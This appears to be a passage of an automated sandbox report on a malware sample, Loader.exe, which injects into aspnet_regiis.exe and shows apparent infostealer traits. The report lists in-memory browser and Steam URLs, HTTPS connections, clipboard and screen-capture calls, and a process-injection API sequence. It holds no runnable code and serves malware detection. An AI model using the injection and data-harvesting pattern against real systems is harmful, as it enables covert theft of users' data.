                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: aspnet_regiis.exe, 00000003.00000003.2151871047.0000000005D24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: aspnet_regiis.exe, 00000003.00000003.2151871047.0000000005D24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: aspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: aspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptc
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: aspnet_regiis.exe, 00000003.00000003.2151871047.0000000005D24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: aspnet_regiis.exe, 00000003.00000003.2151871047.0000000005D24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: aspnet_regiis.exe, 00000003.00000003.2151871047.0000000005D24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: aspnet_regiis.exe, 00000003.00000003.2151871047.0000000005D24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: aspnet_regiis.exe, 00000003.00000003.2151871047.0000000005D24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: aspnet_regiis.exe, 00000003.00000003.2151871047.0000000005D24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49716 version: TLS 1.2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C63E30 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_72C63E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C63E30 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_72C63E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C648C2 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_72C648C2

                System Summary

                barindex
                .NET source code contains very large array initializations
                Source: Loader.exe, GetWin.csLarge array initialization: GetWindowsOS: array initializer size 650240
                Source: C:\Users\user\Desktop\Loader.exeMemory allocated: 72C30000 page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE28C20 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,GetConsoleWindow,ShowWindow,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,GetConsoleWindow,ShowWindow,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,0_2_6CE28C20
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE26E60 GetModuleHandleW,NtQueryInformationProcess,0_2_6CE26E60
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE204700_2_6CE20470
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE28C200_2_6CE28C20
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE26E600_2_6CE26E60
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE32CD00_2_6CE32CD0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE3E8A00_2_6CE3E8A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE4B0900_2_6CE4B090
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE244600_2_6CE24460
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE2EC600_2_6CE2EC60
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE3C8400_2_6CE3C840
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE4E0400_2_6CE4E040
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE3E0500_2_6CE3E050
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE110200_2_6CE11020
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE410000_2_6CE41000
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE35C100_2_6CE35C10
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE45C100_2_6CE45C10
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE4D4100_2_6CE4D410
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE185F00_2_6CE185F0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE395F00_2_6CE395F0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE48DF00_2_6CE48DF0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE2F5D00_2_6CE2F5D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE321D00_2_6CE321D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE3D1B00_2_6CE3D1B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE3A5B00_2_6CE3A5B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE30DB00_2_6CE30DB0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE4B9900_2_6CE4B990
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE461700_2_6CE46170
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE465400_2_6CE46540
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE3C1500_2_6CE3C150
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE319300_2_6CE31930
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE375300_2_6CE37530
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE2E5000_2_6CE2E500
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE4B5000_2_6CE4B500
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE31D100_2_6CE31D10
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE2FEE00_2_6CE2FEE0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE366C00_2_6CE366C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE312C00_2_6CE312C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE4BED00_2_6CE4BED0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE36AA00_2_6CE36AA0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE44AA00_2_6CE44AA0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE406B00_2_6CE406B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE496B00_2_6CE496B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE352800_2_6CE35280
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE3D6600_2_6CE3D660
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE4C6600_2_6CE4C660
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE46E600_2_6CE46E60
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE49E700_2_6CE49E70
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE472500_2_6CE47250
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE36E000_2_6CE36E00
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE35E100_2_6CE35E10
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE333E00_2_6CE333E0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE327F00_2_6CE327F0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE3ABC00_2_6CE3ABC0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE1FFA00_2_6CE1FFA0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE33BB00_2_6CE33BB0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE443800_2_6CE44380
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE3EB600_2_6CE3EB60
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE34B600_2_6CE34B60
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE413600_2_6CE41360
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE42B600_2_6CE42B60
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE363500_2_6CE36350
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE483500_2_6CE48350
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE27F200_2_6CE27F20
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE393200_2_6CE39320
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE357200_2_6CE35720
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE4C3300_2_6CE4C330
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE3CB100_2_6CE3CB10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E2BE83_3_035E2BE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E2BE83_3_035E2BE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E2BE83_3_035E2BE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E2BE83_3_035E2BE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E2BE83_3_035E2BE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E2BE83_3_035E2BE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E2BE83_3_035E2BE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E2BE83_3_035E2BE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E2BE83_3_035E2BE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E2BE83_3_035E2BE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E2BE83_3_035E2BE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E2BE83_3_035E2BE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E2BE83_3_035E2BE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E2BE83_3_035E2BE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E2BE83_3_035E2BE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E2BE83_3_035E2BE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E2BE83_3_035E2BE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E2BE83_3_035E2BE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E2BE83_3_035E2BE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E2BE83_3_035E2BE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E2BE83_3_035E2BE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E2BE83_3_035E2BE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E2BE83_3_035E2BE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E2BE83_3_035E2BE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E2BE83_3_035E2BE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C692803_2_72C69280
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C412273_2_72C41227
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C5D34A3_2_72C5D34A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C3B1003_2_72C3B100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C3E6873_2_72C3E687
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C68EA03_2_72C68EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C3CE453_2_72C3CE45
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C386003_2_72C38600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C457C03_2_72C457C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C574403_2_72C57440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C704603_2_72C70460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C6C5A03_2_72C6C5A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C51D003_2_72C51D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C70D203_2_72C70D20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C49AD03_2_72C49AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C542D03_2_72C542D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C69A803_2_72C69A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C58ABC3_2_72C58ABC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C6CA403_2_72C6CA40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C65A4F3_2_72C65A4F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C6DA4D3_2_72C6DA4D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C342703_2_72C34270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C4E2203_2_72C4E220
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C6FA203_2_72C6FA20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C3F3C03_2_72C3F3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C373D03_2_72C373D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C583D83_2_72C583D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C4EB803_2_72C4EB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C34BA03_2_72C34BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C3AB403_2_72C3AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C513403_2_72C51340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C5F3773_2_72C5F377
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C393103_2_72C39310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C6FB103_2_72C6FB10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C48B1B3_2_72C48B1B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C6FB2A3_2_72C6FB2A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C6FB283_2_72C6FB28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C338C03_2_72C338C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C5A0CA3_2_72C5A0CA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C638D03_2_72C638D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C5C0E63_2_72C5C0E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C460E93_2_72C460E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C4B8F63_2_72C4B8F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C5C09E3_2_72C5C09E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C4C8A03_2_72C4C8A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C688B03_2_72C688B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C3C8403_2_72C3C840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C4D0033_2_72C4D003
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C3D0213_2_72C3D021
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C3D83C3_2_72C3D83C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C581CC3_2_72C581CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C709E03_2_72C709E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C5C9EB3_2_72C5C9EB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C5E1803_2_72C5E180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C6F18B3_2_72C6F18B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C591AE3_2_72C591AE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C539B93_2_72C539B9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C5C09E3_2_72C5C09E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C361603_2_72C36160
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C4E9603_2_72C4E960
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C481693_2_72C48169
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C359003_2_72C35900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C569103_2_72C56910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C546D03_2_72C546D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C706F03_2_72C706F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C32EB03_2_72C32EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C4AEB03_2_72C4AEB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C686503_2_72C68650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C5EE633_2_72C5EE63
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C52E6D3_2_72C52E6D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C50E6C3_2_72C50E6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C5FE743_2_72C5FE74
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C6FE003_2_72C6FE00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C3F60D3_2_72C3F60D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C4961B3_2_72C4961B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C4E6303_2_72C4E630
